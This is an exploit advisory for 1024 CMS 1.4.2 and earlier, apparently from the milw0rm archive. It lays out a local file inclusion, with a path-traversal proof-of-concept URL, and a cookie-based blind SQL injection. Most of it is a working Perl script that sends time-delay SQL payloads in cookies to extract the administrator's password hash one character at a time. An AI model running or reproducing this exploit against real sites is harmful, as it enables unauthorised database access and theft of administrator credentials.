# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 13/04/2008
# CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta)
# Site: 1024cms.com
# Bug1: Local File Inclusion
# Need: magic_quotes_gpc = Off / register_globals = On
# Bug2: Cookie Blind SQL Injection
# Exploit: Admin Hash Retrieve Exploit
# Need: magic_quotes_gpc = Off
# Bug1: Vuln Code: pages/print/default/ops/news.php
<?php
if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
include("./lang/".$lang."/news/default.php");
# $lang is unset so we can exploit through local file inclusion
# Include a local file in CMS directory
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00
# Bug2: Vuln Code: /includes/system.php: Lines 66-71
if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) &&
isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){
$_SESSION['logged'] = $_COOKIE['cooklogged'];
$_SESSION['user'] = $_COOKIE['cookuid'];
$_SESSION['type'] = $_COOKIE['cooktype'];
$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users
WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'")
or die("Cannot check combination: ".mysql_error());
# We can exploit this vulnerable query editing our cookies and making a blind sql injection
### Start Exploit ###
#!/usr/bin/perl -w
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
# Admin Hash Retrieve Exploit
use LWP::UserAgent;
use HTTP::Request;
if(not defined $ARGV[0])
{
print "usage: perl $0 [host] [path]\n";
print "example: perl $0 localhost /1024/\n";
exit;
}
my $client = new LWP::UserAgent;
my @cset = (48..57, 97..102);
my $hash = undef;
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];
banner();
check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n";
syswrite(STDOUT, "[+] Admin Hash: ");
for($j = 1; $j <= 32; $j++)
{
for($i = 0; $i <= $#cset; $i++)
{
$pre_time = time();
$rv = check_char($cset[$i], $j);
$post_time = time();
if($post_time - $pre_time > 3 and $rv)
{
$hash .= chr($cset[$i]);
syswrite(STDOUT, chr($cset[$i]), 1);
last;
}
}
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n";
}
else
{
print STDOUT "\n[+] Exploit terminated\n\n";
}
sub banner
{
print "\n";
print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n";
print "[+] Admin Hash Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}
sub check_vuln
{
my $target = shift;
$get = new HTTP::Request(GET, $target);
$get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");
$res = $client->request($get);
if($res->is_success)
{
return 1 if $res->as_string =~ /Cannot check combination/;
}
else
{
die "[-] Invalid target : ${target}\n\n";
}
return 0;
}
sub check_char
{
my ($char, $n) = @_;
$get->header(Cookie => 'cookpass=-1\'+AND+'.
'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
'cookuid=1; cooktype=1; cooklogged=1; cookuser=1');
$res = $client->request($get);
return $res->is_success;
}
# milw0rm.com [2008-04-13]